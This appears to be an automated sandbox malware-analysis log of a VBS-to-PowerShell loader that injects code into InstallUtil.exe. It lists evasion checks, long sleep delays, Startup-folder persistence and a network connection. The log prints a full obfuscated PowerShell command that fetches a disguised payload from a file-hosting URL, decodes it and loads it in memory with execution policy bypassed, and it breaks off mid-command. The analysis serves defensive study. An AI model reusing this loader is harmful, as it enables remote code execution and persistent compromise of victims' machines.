                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.406d60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                        Source: InstallUtil.exe, 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3395Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1751Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1098Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 376Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4758Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4925Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2314Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7381Jump to behavior
                        Source: C:\Windows\System32\wscript.exe TID: 3564Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep count: 3395 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep count: 1751 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5396Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6264Thread sleep count: 4758 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep count: 4925 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4236Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1944Thread sleep count: 2314 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1944Thread sleep count: 7381 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: InstallUtil.exe, 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: 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
                        Source: InstallUtil.exe, 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: InstallUtil.exe, 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,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
                        Source: wscript.exe, 00000000.00000003.2299241877.0000023841E04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2298344275.0000023841E04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305436215.0000023841DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2299241877.0000023841DBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: InstallUtil.exe, 0000000D.00000002.3421734671.00000000011FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.187.200 443Jump to behavior
                        Source: Yara matchFile source: amsi64_3960.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3960.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3960, type: MEMORYSTR
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 416000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 418000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C27008Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhv